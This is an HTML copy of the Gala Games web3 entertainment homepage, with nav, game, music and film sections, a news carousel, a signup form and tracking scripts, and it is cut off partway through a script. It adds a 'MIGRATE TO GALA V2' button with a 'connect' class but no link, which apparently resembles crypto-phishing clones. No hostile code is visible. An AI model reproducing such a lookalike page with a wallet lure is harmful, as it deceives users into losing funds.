<!DOCTYPE html>
<html>
  <head>
    <link rel="stylesheet" href="./scripts/entry.3d4ebcd0.css">
    <link rel="modulepreload" as="script" crossorigin="" href="./scripts/index-3d58414d.mjs">
    <link rel="modulepreload" as="script" crossorigin="" href="./scripts/swiper-slide-791fa3de.mjs">
    <title>Gala</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="facebook-domain-verification" content="xeq6rb4pr369gxeo5rzv6e7aeh4nsk">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Material+Icons">
  
    <meta name="head:count" content="5">
    <link rel="stylesheet" href="./scripts/custom.8f1c9f07.css">
    <link rel="modulepreload" as="script" crossorigin="" href="./scripts/SignUpForm-d07cbcaa.mjs">
    <link rel="modulepreload" as="script" crossorigin="" href="./scripts/footer-7cb6f372.mjs">
    <script type="text/javascript" charset="utf-8" src="https://prism.app-us1.com?a=91470544&amp;u=https%3A%2F%2Fgala.com%2F&amp;t=dbf9414a-b13f-44db-bae8-a6a66f16ef77" async=""></script>
    <script charset="utf-8" src="https://analytics.tiktok.com/i18n/pixel/static/identify_738b3.js"></script>
    <script type="text/javascript" charset="utf-8" src="https://trackcmp.net/t_prism_sitemessages.php?trackid=91470544&amp;prismid=dbf9414a-b13f-44db-bae8-a6a66f16ef77&amp;url=https%3A%2F%2Fgala.com%2F" async=""></script>
  </head>
  <body>
    <div id="_scripts" data-v-app="">
      <div class="bg-black">
        <div class="">
          <nav class="gala-header" data-v-0afaa9ba="">
            <div class="py-5 mx-auto px-6 flex items-center justify-between" data-v-0afaa9ba="">
              <div class="flex items-center justify-between gap-[30px]" data-v-0afaa9ba="">
                <a href="https://gala.com/" data-v-0afaa9ba="">
                  <img src="./icons/gala.svg" data-v-0afaa9ba="">
                </a>
                <div data-v-0afaa9ba="">
                  <div class="gala-nav md:block lg:block not-active" data-v-0afaa9ba="">
                    <ul class="gala-nav__list transition" data-v-0afaa9ba="">
                      <li class="gala-nav__list-item" data-v-0afaa9ba="">
                        <a href="https://app.gala.games/" target="_blank" class="mr-2" data-v-0afaa9ba="">Games</a>
                        <img src="./icons/link-arrow.svg" data-v-0afaa9ba="">
                      </li>
                      <li class="gala-nav__list-item" data-v-0afaa9ba="">
                        <a href="https://music.gala.com/" target="_blank" class="mr-2" data-v-0afaa9ba="">Music</a>
                        <img src="./icons/link-arrow.svg" data-v-0afaa9ba="">
                      </li>
                      <li class="gala-nav__list-item" data-v-0afaa9ba="">
                        <a href="https://film.gala.com/" target="_blank" class="mr-2" data-v-0afaa9ba="">Film</a>
                        <img src="./icons/link-arrow.svg" data-v-0afaa9ba="">
                      </li>
                      <li class="gala-nav__list-item" data-v-0afaa9ba="">
                        <a href="./galaverse" data-v-0afaa9ba="">Galaverse</a>
                      </li>
                      <li class="gala-nav__list-cta md:hidden" data-v-0afaa9ba="">
                        <a class="text-black" href="https://gala.com/sign-up" data-v-0afaa9ba="">
                          <button data-v-0afaa9ba="">Sign Up</button>
                        </a>
                      </li>
                    </ul>
                  </div>
                </div>
              </div>
              <div class="gala-menu" data-v-0afaa9ba="">
                <div class="gala-menu__toggle relative z-50 sm:block md:hidden text-white focus:outline-none" data-v-0afaa9ba="">
                  <div class="hamburger" data-v-0afaa9ba="">
                    <span data-v-0afaa9ba=""></span>
                  </div>
                </div>
              </div>
              <div class="gala-nav__rightmenu hidden md:flex justify-center gap-2 items-center" data-v-0afaa9ba="">
                <a href="https://galagames.chat/" class="md:inline-block transition duration-150 ease-in-out px-6" target="_blank" data-v-0afaa9ba="">
                  <img src="./icons/discord.svg" data-v-0afaa9ba="">
                </a>
                <a class="text-black" href="https://gala.com/sign-up" data-v-0afaa9ba="">
                  <button data-v-0afaa9ba="">Sign Up</button>
                </a>
              </div>
            </div>
          </nav>
          <div>
        <br /><br />

            <div class="w-full gala-mission bg-[#010308]">
              <div class="container mx-auto flex flex-col md:flex-row justify-between items-center w-full flex-grow md:p-10 lg:p-36 mt-10 lg:mt-0">
                <div class="w-1/2 py-4">
                  <img src="./sources/anim-logo.gif" alt="Gala" style="max-height:120px;" class="lg:pr-[50px]">
                </div>
                <div class="w-1/2">
                  <div class="text-white mx-auto text-2xl lg:text-4xl lg:text-left lg:border-t-0 text-center font-normal block border-t lg:border-l border-blue-500 lg:pl-[50px] py-4 leading-10">Entertainment <br>that empowers. </div>
                </div>
                <button target="_blank" class="connect inline-block rounded-[47px] border-2 py-2 px-6 border-[#268AEF] text-[#268AEF] text-[14px] mx-auto" data-v-6d5b0b30="">MIGRATE TO GALA V2</button>
           
              </div>
              
            </div>
                  
            <div class="w-full">
              <div class="container mx-auto p-10 lg:p-20">
                <h4 class="text-white text-3xl font-medium pb-[10px] block text-center lg:text-left mt-10">Our Pillars</h4>
                <h4 class="text-white text-l font-medium pb-[30px] block text-center lg:text-left">Together, we are a community-uplifting powerhouse defining new frontiers in Web3 entertainment.</h4>
                <div style="perspective: 1000px;">
                  <div class="welcome-container grid md:grid-cols-2 sm:grid-cols-1 lg:grid-cols-4 gap-[25px] lg:gap-[75px]">
                    <div>
                      <div style="transition-property: transform; transition-duration: 1000ms; transform-origin: center center; transition-timing-function: cubic-bezier(0.23, 1, 0.32, 1);">
                        <a href="https://app.gala.games">
                          <img src="./sources/games-thumb.png" alt="Gala Games" class="pillar-img">
                        </a>
                        <a href="https://app.gala.games" class="text-white pt-6 block text-base">Gala Games <span>→</span>
                        </a>
                      </div>
                    </div>
                    <div>
                      <div style="transition-property: transform; transition-duration: 1000ms; transform-origin: center center; transition-timing-function: cubic-bezier(0.23, 1, 0.32, 1);">
                        <a href="https://film.gala.com/">
                          <img src="./sources/film-thumb.png" alt="Gala Film" class="pillar-img">
                        </a>
                        <a href="https://film.gala.com/" class="text-white pt-6 block text-base">Gala Film <span>→</span>
                        </a>
                      </div>
                    </div>
                    <div>
                      <div style="transition-property: transform; transition-duration: 1000ms; transform-origin: center center; transition-timing-function: cubic-bezier(0.23, 1, 0.32, 1);">
                        <a href="https://music.gala.com/">
                          <img src="./sources/music-thumb.png" alt="Gala Music" class="pillar-img">
                        </a>
                        <a href="https://music.gala.com/" class="text-white pt-6 block text-base">Gala Music <span>→</span>
                        </a>
                      </div>
                    </div>
                    <div>
                      <div style="transition-property: transform; transition-duration: 1000ms; transform-origin: center center; transition-timing-function: cubic-bezier(0.23, 1, 0.32, 1);">
                        <a href="./galaverse">
                          <img src="./sources/galaverse-thumb.png" alt="Galaverse" class="pillar-img">
                        </a>
                        <a href="./galaverse" class="text-white pt-6 block text-base">Into the Galaverse <span>→</span>
                        </a>
                      </div>
                    </div>
                  </div>
                  <!---->
                </div>
              </div>
            </div>
            <div class="w-full" data-v-6d5b0b30="">
              <div class="container mx-auto flex flex-col md:flex-row justify-between items-center w-full flex-grow p-10 lg:p-20" data-v-6d5b0b30="">
                <div class="games-img-container lg:w-1/2 mb-36 lg:mb-0 lg:mr-36 md:mr-28" data-v-6d5b0b30="">
                  <div data-v-6d5b0b30="" style="perspective: 1000px;">
                    <div data-v-6d5b0b30="" style="transition-property: transform; transition-duration: 1000ms; transform-origin: center center; transition-timing-function: cubic-bezier(0.23, 1, 0.32, 1);">
                      <img src="./sources/grit.svg" alt="Gala Games" class="games-img imageOne" data-v-6d5b0b30="">
                      <img src="./sources/spider.svg" alt="Gala Games" class="games-img imageTwo" data-v-6d5b0b30="">
                    </div>
                    <!---->
                  </div>
                </div>
                <div class="w-full lg:w-1/2 lg:text-left text-center mx-auto" data-v-6d5b0b30="">
                  <h4 class="text-white font-medium text-[45px] mx-auto" data-v-6d5b0b30="">Games</h4>
                  <div class="text-white font-normal block leading-[22px] text-info text-base pb-[30px] mx-auto lg:mx-0" data-v-6d5b0b30="">We are all gamers at heart, and Web3 allows us to reconnect with a sense of play that is crucial to our humanity. <br data-v-6d5b0b30="">
                    <br data-v-6d5b0b30="">Own your gaming experience in a way that gamers have never known, and empower yourself with more freedom, more control, and more rewards. Welcome to Web3 gaming.
                  </div>
                  <a href="https://app.gala.games" target="_blank" class="inline-block rounded-[47px] border-2 py-2 px-6 border-[#268AEF] text-[#268AEF] text-[14px] mx-auto" data-v-6d5b0b30="">Visit Games</a>
                  <div class="text-white flex items-start pt-[35px] mx-auto" data-v-6d5b0b30="">
                    <div class="pl-[13px] pr-[37px] border-l border-l-[#6A6A6A]" data-v-6d5b0b30="">
                      <span class="text-[#6A6A6A] text-[9px] uppercase" data-v-6d5b0b30="">Games</span>
                      <div class="text-white text-[27px] font-medium" data-v-6d5b0b30="">28</div>
                    </div>
                    <div class="pl-[13px] pr-[37px] border-l border-l-[#6A6A6A]" data-v-6d5b0b30="">
                      <span class="text-[#6A6A6A] text-[9px] uppercase" data-v-6d5b0b30="">REWARDS DISTRIBUTED TO PLAYERS</span>
                      <div class="text-white text-[27px] font-medium" data-v-6d5b0b30="">$2.2 billion</div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
            <div class="w-full" data-v-3db48752="">
              <div class="container mx-auto flex flex-col-reverse md:flex-row justify-between items-center w-full flex-grow p-10 lg:p-20" data-v-3db48752="">
                <div class="lg:w-1/2 lg:text-left text-center mx-auto" data-v-3db48752="">
                  <h4 class="text-white font-medium text-[45px] mx-auto" data-v-3db48752="">Music</h4>
                  <div class="text-white font-normal block leading-[22px] text-info text-base pb-[30px] mx-auto lg:mx-0" data-v-3db48752="">By decentralizing music ownership in our new Web3 world of music, Gala has empowered artists, fans, and music lovers all over the world.</div>
                  <a href="https://music.gala.com" target="_blank" class="inline-block rounded-[47px] border-2 py-2 px-6 border-[#268AEF] text-[#268AEF] text-[14px] mx-auto" data-v-3db48752="">Visit Music</a>
                  <div class="text-white flex items-start pt-[35px] mx-auto" data-v-3db48752="">
                    <div class="pl-[13px] pr-[37px] border-l border-l-[#6A6A6A]" data-v-3db48752="">
                      <span class="text-[#6A6A6A] text-[9px] uppercase" data-v-3db48752="">Artists</span>
                      <div class="text-white text-[27px] font-medium" data-v-3db48752="">6</div>
                    </div>
                    <div class="pl-[13px] pr-[37px] border-l border-l-[#6A6A6A]" data-v-3db48752="">
                      <span class="text-[#6A6A6A] text-[9px] uppercase" data-v-3db48752="">REWARDS DISTRIBUTED TO ARTISTS</span>
                      <div class="text-white text-[27px] font-medium" data-v-3db48752="">$15M +</div>
                    </div>
                  </div>
                </div>
                <div class="music-img-container w-full lg:w-1/2 lg:mb-0 mb-36 md:ml-28 sm:ml-0" data-v-3db48752="">
                  <div data-v-3db48752="" style="perspective: 1000px;">
                    <div data-v-3db48752="" style="transition-property: transform; transition-duration: 1000ms; transform-origin: center center; transition-timing-function: cubic-bezier(0.23, 1, 0.32, 1);">
                      <img src="./sources/gg_snoop_music.png" alt="Gala Music" class="music-img imageOne" data-v-3db48752="">
                      <img src="./sources/bt.svg" alt="Gala Music" class="music-img imageTwo" data-v-3db48752="">
                    </div>
                    <!---->
                  </div>
                </div>
              </div>
            </div>
            <div class="w-full" data-v-0fa46892="">
              <div class="container mx-auto flex flex-col md:flex-row justify-between items-center w-full flex-grow p-10 lg:p-20" data-v-0fa46892="">
                <div class="film-img-container pb-16 md:pb-0 lg:w-1/2 lg:mr-36 md:mr-28" data-v-0fa46892="">
                  <div data-v-0fa46892="" style="perspective: 1000px;">
                    <div data-v-0fa46892="" style="transition-property: transform; transition-duration: 1000ms; transform-origin: center center; transition-timing-function: cubic-bezier(0.23, 1, 0.32, 1);">
                      <div class="video" data-v-0fa46892="">
                        <div class="video__action" data-v-0fa46892="">
                          <div class="video__action-buttons overlay-text flex flex-col" data-v-0fa46892="">
                            <img class="h-10" src="./icons/mute.png" data-v-0fa46892="">
                          </div>
                        </div>
                        <video playsinline="" autoplay="" loop="" src="./sources/the-making-of-the-chronic.mp4" type="video/webm" data-v-0fa46892=""></video>
                      </div>
                    </div>
                    <!---->
                  </div>
                </div>
                <div class="w-full lg:w-1/2 lg:text-left text-center mx-auto" data-v-0fa46892="">
                  <h4 class="text-white font-medium text-[45px] mx-auto" data-v-0fa46892="">Film</h4>
                  <div class="text-white font-normal block text-info leading-[22px] text-base pb-[30px] mx-auto lg:mx-0" data-v-0fa46892="">Creating long-awaited Web3 solutions for TV and Film, Gala Film will empower emerging artists and fans, while bringing to life some incredible creative work. <br data-v-0fa46892="">
                    <br data-v-0fa46892="">There will be abundant reward and ownership opportunities in the Gala Film Ecosystem.
                  </div>
                  <a href="https://film.gala.com/" class="inline-block rounded-[47px] border-2 py-2 px-6 border-[#268AEF] text-[#268AEF] text-[14px] mx-auto" data-v-0fa46892="">Visit Film</a>
                  <div class="text-white flex items-start pt-[35px] mx-auto" data-v-0fa46892="">
                    <div class="pl-[13px] pr-[37px] border-l border-l-[#6A6A6A]" data-v-0fa46892="">
                      <span class="text-[#6A6A6A] text-[9px] uppercase" data-v-0fa46892="">Launching</span>
                      <div class="text-white text-[27px] font-medium" data-v-0fa46892="">2022</div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
            <div class="bg-[#020712] px-5 py-20 md:px-0" data-v-4a204ef8="">
              <div class="container mx-auto" data-v-4a204ef8="">
                <div class="flex justify-between pb-[60px]" data-v-4a204ef8="">
                  <h4 class="text-white text-3xl font-medium m-0" data-v-4a204ef8="">Latest News</h4>
                </div>
              </div>
              <div class="w-full mb-8" data-aos="fade-left" data-v-4a204ef8="">
                <div class="swiper swiper-initialized swiper-horizontal swiper-pointer-events items-stretch justify-right swiper-backface-hidden" data-v-4a204ef8="">
                  <div class="swiper-wrapper" style="transform: translate3d(0px, 0px, 0px);">
                    <div class="swiper-slide swiper-slide-active" data-v-4a204ef8="" style="width: 641px; margin-right: 20px;">
                      <a href="https://www.marketwatch.com/press-release/town-star-wins-best-blockchain-game-2022-06-13" class="block" target="_blank" data-v-4a204ef8="">
                        <img loading="lazy" src="https://cdn.sanity.io/images/g9ns5zhx/production/710e037a7c57df68e9281bdd029a9d9b2d492f69-1226x655.jpg?rect=36,0,1155,655&amp;w=342&amp;h=194" alt="{{ item.category }}" class="object-cover object-center news-img" data-v-4a204ef8="">
                        <div class="text-left contain-text py-2" data-v-4a204ef8="">
                          <span class="text-[#6A6A6A] text-[16px] uppercase block" data-v-4a204ef8="">Town Star</span>
                          <span class="text-white text-lg block" data-v-4a204ef8="">Town Star Wins Best Blockchain Game!</span>
                        </div>
                      </a>
                    </div>
                    <div class="swiper-slide swiper-slide-next" data-v-4a204ef8="" style="width: 641px; margin-right: 20px;">
                      <a href="https://aibc.world/news/galaverse-malta-the-web3-future-of-entertainment/" class="block" target="_blank" data-v-4a204ef8="">
                        <img loading="lazy" src="https://cdn.sanity.io/images/g9ns5zhx/production/21f8f3bbae2480792a21d1a3a6a243e79b8a3b5a-795x435.jpg?rect=15,0,767,435&amp;w=342&amp;h=194" alt="{{ item.category }}" class="object-cover object-center news-img" data-v-4a204ef8="">
                        <div class="text-left contain-text py-2" data-v-4a204ef8="">
                          <span class="text-[#6A6A6A] text-[16px] uppercase block" data-v-4a204ef8="">Galaverse</span>
                          <span class="text-white text-lg block" data-v-4a204ef8="">Galaverse Malta: The Web3 future of Entertainment</span>
                        </div>
                      </a>
                    </div>
                    <div class="swiper-slide" data-v-4a204ef8="" style="width: 641px; margin-right: 20px;">
                      <a href="https://www.marketwatch.com/press-release/gala-games-is-paving-the-future-for-blockchain-games-with-grit-2022-06-06?mod=search_headline" class="block" target="_blank" data-v-4a204ef8="">
                        <img loading="lazy" src="https://cdn.sanity.io/images/g9ns5zhx/production/de5b452dd7075d676edbfb76c4112362785309b3-490x273.png?rect=5,0,481,273&amp;w=342&amp;h=194" alt="{{ item.category }}" class="object-cover object-center news-img" data-v-4a204ef8="">
                        <div class="text-left contain-text py-2" data-v-4a204ef8="">
                          <span class="text-[#6A6A6A] text-[16px] uppercase block" data-v-4a204ef8="">GRIT</span>
                          <span class="text-white text-lg block" data-v-4a204ef8="">Gala Games is Paving the Future for Blockchain Games with GRIT</span>
                        </div>
                      </a>
                    </div>
                    <div class="swiper-slide" data-v-4a204ef8="" style="width: 641px; margin-right: 20px;">
                      <a href="https://www.billboard.com/business/streaming/snoop-dogg-death-row-why-pull-streaming-1235060577/" class="block" target="_blank" data-v-4a204ef8="">
                        <img loading="lazy" src="https://cdn.sanity.io/images/g9ns5zhx/production/838b987569a56211acab701015ed8ab81e6eeac0-681x383.webp?rect=4,0,675,383&amp;w=342&amp;h=194" alt="{{ item.category }}" class="object-cover object-center news-img" data-v-4a204ef8="">
                        <div class="text-left contain-text py-2" data-v-4a204ef8="">
                          <span class="text-[#6A6A6A] text-[16px] uppercase block" data-v-4a204ef8="">Music</span>
                          <span class="text-white text-lg block" data-v-4a204ef8="">Here’s Why Snoop Dogg Says He Pulled Death Row’s Catalog From Streaming</span>
                        </div>
                      </a>
                    </div>
                    <div class="swiper-slide" data-v-4a204ef8="" style="width: 641px; margin-right: 20px;">
                      <a href="https://venturebeat.com/2022/06/06/gala-games-blockchain-game-grit-will-debut-on-the-epic-games-store/" class="block" target="_blank" data-v-4a204ef8="">
                        <img loading="lazy" src="https://cdn.sanity.io/images/g9ns5zhx/production/2021240d178eb902b17e3c43f9b5f2de48f67bae-490x273.png?rect=5,0,481,273&amp;w=342&amp;h=194" alt="{{ item.category }}" class="object-cover object-center news-img" data-v-4a204ef8="">
                        <div class="text-left contain-text py-2" data-v-4a204ef8="">
                          <span class="text-[#6A6A6A] text-[16px] uppercase block" data-v-4a204ef8="">GRIT</span>
                          <span class="text-white text-lg block" data-v-4a204ef8="">Gala Games’ blockchain game GRIT will debut on the Epic Games Store</span>
                        </div>
                      </a>
                    </div>
                    <div class="swiper-slide" data-v-4a204ef8="" style="width: 641px; margin-right: 20px;">
                      <a href="https://venturebeat.com/2021/12/13/gala-games-and-c%C2%B2-ventures-launch-100m-fund-for-blockchain-games/" class="block" target="_blank" data-v-4a204ef8="">
                        <img loading="lazy" src="https://cdn.sanity.io/images/g9ns5zhx/production/fdc259098954125e9fd2ec7a8e51a145a2216f67-750x500.png?rect=0,38,750,425&amp;w=342&amp;h=194" alt="{{ item.category }}" class="object-cover object-center news-img" data-v-4a204ef8="">
                        <div class="text-left contain-text py-2" data-v-4a204ef8="">
                          <span class="text-[#6A6A6A] text-[16px] uppercase block" data-v-4a204ef8="">Galaverse</span>
                          <span class="text-white text-lg block" data-v-4a204ef8="">Gala Games and C² Ventures launch $100M fund for blockchain games</span>
                        </div>
                      </a>
                    </div>
                    <div class="swiper-slide" data-v-4a204ef8="" style="width: 641px; margin-right: 20px;">
                      <a href="https://www.rollingstone.com/music/music-news/for-a-coosnoop-dogg-b-o-d-r-bacc-on-death-row-nft-1297638/" class="block" target="_blank" data-v-4a204ef8="">
                        <img loading="lazy" src="https://cdn.sanity.io/images/g9ns5zhx/production/182934fcd9033ff681eb349bc8ff4bff76b0673f-1200x800.png?rect=0,60,1200,681&amp;w=342&amp;h=194" alt="{{ item.category }}" class="object-cover object-center news-img" data-v-4a204ef8="">
                        <div class="text-left contain-text py-2" data-v-4a204ef8="">
                          <span class="text-[#6A6A6A] text-[16px] uppercase block" data-v-4a204ef8="">Music</span>
                          <span class="text-white text-lg block" data-v-4a204ef8="">For Just $5,000 You Can Own One Snoop Dogg Song on the Blockchain</span>
                        </div>
                      </a>
                    </div>
                    <div class="swiper-slide" data-v-4a204ef8="" style="width: 641px; margin-right: 20px;">
                      <a href="https://www.wsj.com/articles/nfts-are-spurring-a-digital-land-grabin-videogame-worlds-11616414401" class="block" target="_blank" data-v-4a204ef8="">
                        <img loading="lazy" src="https://cdn.sanity.io/images/g9ns5zhx/production/f9235fc3fc2a34a5ead4599940260eabd4520912-1290x859.jpg?rect=0,64,1290,732&amp;w=342&amp;h=194" alt="{{ item.category }}" class="object-cover object-center news-img" data-v-4a204ef8="">
                        <div class="text-left contain-text py-2" data-v-4a204ef8="">
                          <span class="text-[#6A6A6A] text-[16px] uppercase block" data-v-4a204ef8="">Games</span>
                          <span class="text-white text-lg block" data-v-4a204ef8="">NFTs Are Spurring a Digital Land Grab—in Videogame Worlds</span>
                        </div>
                      </a>
                    </div>
                    <div class="swiper-slide" data-v-4a204ef8="" style="width: 641px; margin-right: 20px;">
                      <a href="https://www.prnewswire.com/news-releases/gala-games-ushers-in-blockchain-generation-of-gaming-with-galaverse-301442842.html" class="block" target="_blank" data-v-4a204ef8="">
                        <img loading="lazy" src="https://cdn.sanity.io/images/g9ns5zhx/production/fdc259098954125e9fd2ec7a8e51a145a2216f67-750x500.png?rect=0,38,750,425&amp;w=342&amp;h=194" alt="{{ item.category }}" class="object-cover object-center news-img" data-v-4a204ef8="">
                        <div class="text-left contain-text py-2" data-v-4a204ef8="">
                          <span class="text-[#6A6A6A] text-[16px] uppercase block" data-v-4a204ef8="">Galaverse</span>
                          <span class="text-white text-lg block" data-v-4a204ef8="">Gala Games Ushers in Blockchain Generation of Gaming with Galaverse</span>
                        </div>
                      </a>
                    </div>
                    <div class="swiper-slide" data-v-4a204ef8="" style="width: 641px; margin-right: 20px;">
                      <a href="https://www.theverge.com/22832188/peter-molyneux-22cans-gala-nft-blockchain-business-simulator-game-interview" class="block" target="_blank" data-v-4a204ef8="">
                        <img loading="lazy" src="https://cdn.sanity.io/images/g9ns5zhx/production/94560940f4bde3f2d90ac12b64978b3996310fb0-1675x1675.webp?rect=0,363,1675,950&amp;w=342&amp;h=194" alt="{{ item.category }}" class="object-cover object-center news-img" data-v-4a204ef8="">
                        <div class="text-left contain-text py-2" data-v-4a204ef8="">
                          <span class="text-[#6A6A6A] text-[16px] uppercase block" data-v-4a204ef8="">Games</span>
                          <span class="text-white text-lg block" data-v-4a204ef8="">Peter Molyneux's NFT game will make being nice cost real money</span>
                        </div>
                      </a>
                    </div>
                  </div>
                  <!---->
                  <!---->
                  <!---->
                </div>
              </div>
              <div class="container mx-auto py-10" data-v-4a204ef8="">
                <div class="flex flex-row items-center justify-center md:justify-start gap-4" data-v-4a204ef8="">
                  <button type="button" class="latest-news-swiper-button-prev swiper-nav-button text-white swiper-button-disabled" data-v-4a204ef8="" disabled="">
                    <img src="./icons/prev-arrow.svg" alt="Prev" data-v-4a204ef8="">
                  </button>
                  <button type="button" class="latest-news-swiper-button-next swiper-slide-next swiper-nav-button text-white" data-v-4a204ef8="">
                    <img src="./icons/next-arrow.svg" alt="Next" data-v-4a204ef8="">
                  </button>
                </div>
              </div>
            </div>
            <div class="galaverse-banner w-full bg-[url('/sources/gv-banner.jpeg')] bg-cover bg-center h-[480px] md:h-[694px]" data-v-53fc5828="">
              <div class="galaverse-banner__content container py-20 mx-auto" data-v-53fc5828="">
                <img src="./icons/galaverse-logo-white.svg" class="gv-mark px-10 md:px-10" data-v-53fc5828="">
                <div class="absolute bottom-20 px-10 md:px-10" data-v-53fc5828="">
                  <h2 class="font-medium text-2xl lg:text-5xl pb-5" data-v-53fc5828="">Events of a Lifetime</h2>
                  <h4 class="font-normal text-l lg:text-3xl pb-5 md:w-3/4" data-v-53fc5828="">Bringing the Galaverse into reality with events that exceed the imagination</h4>
                  <a href="./galaverse" class="inline-block rounded-[47px] border-2 py-2 px-6 border-white text-white text-[14px] cursor-pointer" data-v-53fc5828="">Learn More</a>
                </div>
              </div>
            </div>
            <div class="bg-dark py-32" data-v-36eafd78="">
              <div class="w-10/12 mx-auto" data-v-36eafd78="">
                <div data-v-36eafd78="" style="perspective: 1000px;">
                  <div class="grid grid-cols-1 md:grid-cols-2 md:gap-5" data-v-36eafd78="">
                    <div data-v-36eafd78="" style="transition-property: transform; transition-duration: 1000ms; transform-origin: center center; transition-timing-function: cubic-bezier(0.23, 1, 0.32, 1);">
                      <div class="p-8 mt-8 md:mt-0 relative cursor-pointer discord" data-v-36eafd78="">
                        <img class="h-10 mb-6" src="./icons/discord.svg" data-v-36eafd78="">
                        <label data-v-36eafd78="">Join Our Discord </label>
                        <img class="arrow" src="./icons/arrow.svg" data-v-36eafd78="">
                      </div>
                    </div>
                    <div data-v-36eafd78="" style="transition-property: transform; transition-duration: 1000ms; transform-origin: center center; transition-timing-function: cubic-bezier(0.23, 1, 0.32, 1);">
                      <div class="p-8 mt-8 md:mt-0 relative cursor-pointer careers" data-v-36eafd78="">
                        <img class="h-10 mb-6" src="./icons/iso-gala.svg" data-v-36eafd78="">
                        <label data-v-36eafd78="">Careers </label>
                        <img class="arrow" src="./icons/arrow.svg" data-v-36eafd78="">
                      </div>
                    </div>
                  </div>
                  <!---->
                </div>
              </div>
            </div>
          </div>
          <div class="grid grid-cols-2 md:grid-cols-12 bg-black items-center py-20 justify-items-center md:justify-items-start" data-v-5c809264="">
            <div class="md:col-start-2 md:col-end-4 pl-8 md:pl-0" data-v-5c809264="">
              <img src="./icons/gala.svg" class="mb-8" data-v-5c809264="">
              <p class="text-xs" data-v-5c809264=""> © Gala Games. All rights reserved.</p>
              <p class="text-xs" data-v-5c809264="">
                <a href="https://gala.com/terms-and-conditions" target="_blank" data-v-5c809264="">Terms and Conditions</a> | <a href="https://gala.com/privacy-policy" target="_blank" data-v-5c809264="">Privacy Policy</a>
              </p>
            </div>
            <div class="md:col-start-5 md:col-end-10 hidden md:block" data-v-5c809264="">
              <label class="title" data-v-5c809264="">Be the first to know about Gala. </label>
              <div class="flex items-center mb-5" data-v-12f4f1d4="" data-v-5c809264="">
                <form class="form-signup grid grid-cols-1 gap-y-6" data-v-12f4f1d4="">
                  <!---->
                  <div class="form-signup__email" data-v-12f4f1d4="">
                    <div class="w-full" data-v-12f4f1d4="">
                      <label for="email" class="sr-only" data-v-12f4f1d4="">email</label>
                      <div class="relative rounded-md shadow-sm" data-v-12f4f1d4="">
                        <input autocomplete="off" required="" name="email" id="email" type="email" class="bg-dark px-6 py-2.5 font-normal" placeholder="Enter your Email here..." data-v-12f4f1d4="">
                      </div>
                    </div>
                    <button type="submit" class="btn-sign mx-3.5 py-2.5 font-medium text-sm hidden md:block" data-v-12f4f1d4="">Submit</button>
                  </div>
                  <div class="form-signup__terms flex items-start mb-2.5" data-v-12f4f1d4="">
                    <input required="" type="checkbox" name="accept" value="true" data-v-12f4f1d4="">
                    <label for="accept" class="text-sm font-normal ml-2.5" data-v-12f4f1d4="">I accept and agree to the <a href="https://gala.com/privacy-policy" class="underline" target="_blank" data-v-12f4f1d4="">Privacy Policy</a> and <a href="https://gala.com/terms-and-conditions" class="underline" target="_blank" data-v-12f4f1d4="">Terms and Conditions</a>. </label>
                  </div>
                  <div class="form-signup__terms flex items-start" data-v-12f4f1d4="">
                    <input required="" type="checkbox" name="agree" value="true" data-v-12f4f1d4="">
                    <label for="agree" class="text-sm font-normal ml-2.5" data-v-12f4f1d4="">I agree to receive promotional materials from Gala. <br data-v-12f4f1d4=""> I understand that I can withdraw my consent at any time. </label>
                  </div>
                  <div class="form-signup__mobile block md:hidden" data-v-12f4f1d4="">
                    <button type="submit" class="btn-sign py-2.5 font-medium text-sm" data-v-12f4f1d4="">Submit</button>
                  </div>
                </form>
              </div>
            </div>
            <div class="md:col-start-10 mt-16 md:mt-0" data-v-5c809264="">
              <div class="flex" data-v-5c809264="">
                <img class="w-6" src="./icons/instagram.svg" data-v-5c809264="">
                <a href="https://www.instagram.com/gogalagames/" target="_blank" class="text-sm link-text pl-2.5" data-v-5c809264="">Instagram</a>
              </div>
              <div class="flex" data-v-5c809264="">
                <img class="w-6 twit-logo" src="./icons/twitter.svg" data-v-5c809264="">
                <a href="https://twitter.com/GoGalaGames" target="_blank" class="text-sm pl-2.5" data-v-5c809264="">Twitter</a>
              </div>
              <div class="flex" data-v-5c809264="">
                <img class="w-6" src="./icons/discord-square.svg" data-v-5c809264="">
                <a href="https://galagames.chat/" target="_blank" class="text-sm link-text pl-2.5" data-v-5c809264="">Discord</a>
              </div>
              <div class="flex" data-v-5c809264="">
                <img class="w-6 medium-logo" src="./icons/medium.svg" data-v-5c809264="">
                <a href="https://gogalagames.medium.com/" target="_blank" class="text-sm link-text pl-2.5" data-v-5c809264="">Medium</a>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <script>
      window._scripts__ = {
        serverRendered: false,
        config: {
          public: {},
          app: {
            baseURL: "\u002F",
            buildAssetsDir: "\u002Fscripts\u002F",
            cdnURL: ""
          }
        }
      }
    </script>
    <!-- <script type="module" src="./scripts/entry-b423da7c.mjs"></script> -->
    <script type="text/javascript" id="">
      ! function(d, g, e) {
        d.TiktokAnalyticsObject = e;
        var a = d[e] = d[e] || [];
        a.methods = "page track identify instances debug on off once ready alias group enableCookie disableCookie".split(" ");
        a.setAndDefer = function(b, c) {
          b[c] = function() {
            b.push([c].concat(Array.prototype.slice.call(arguments, 0)))
          }
        };
        for (d = 0; d < a.methods.length; d++) a.setAndDefer(a, a.methods[d]);
        a.instance = function(b) {
          b = a._i[b] || [];
          for (var c = 0; c < a.methods.length; c++) a.setAndDefer(b, a.methods[c]);
          return b
        };
        a.load = function(b, c) {
          var f = "https://analytics.tiktok.com/i18n/pixel/events.js";
          a._i = a._i || {};
          a._i[b] = [];
          a._i[b]._u = f;
          a._t = a._t || {};
          a._t[b] = +new Date;
          a._o = a._o || {};
          a._o[b] = c || {};
          c = document.createElement("script");
          c.type = "text/javascript";
          c.async = !0;
          c.src = f + "?sdkid\x3d" + b + "\x26lib\x3d" + e;
          b = document.getElementsByTagName("script")[0];
          b.parentNode.insertBefore(c, b)
        };
        a.load("CB4VLP3C77U9EAGVF7H0");
        a.page()
      }(window, document, "ttq");
    </script>
    <script type="text/javascript" id="">
      (function(a, d, e, f, g, b, c) {
        a.visitorGlobalObjectAlias = f;
        a[a.visitorGlobalObjectAlias] = a[a.visitorGlobalObjectAlias] || function() {
          (a[a.visitorGlobalObjectAlias].q = a[a.visitorGlobalObjectAlias].q || []).push(arguments)
        };
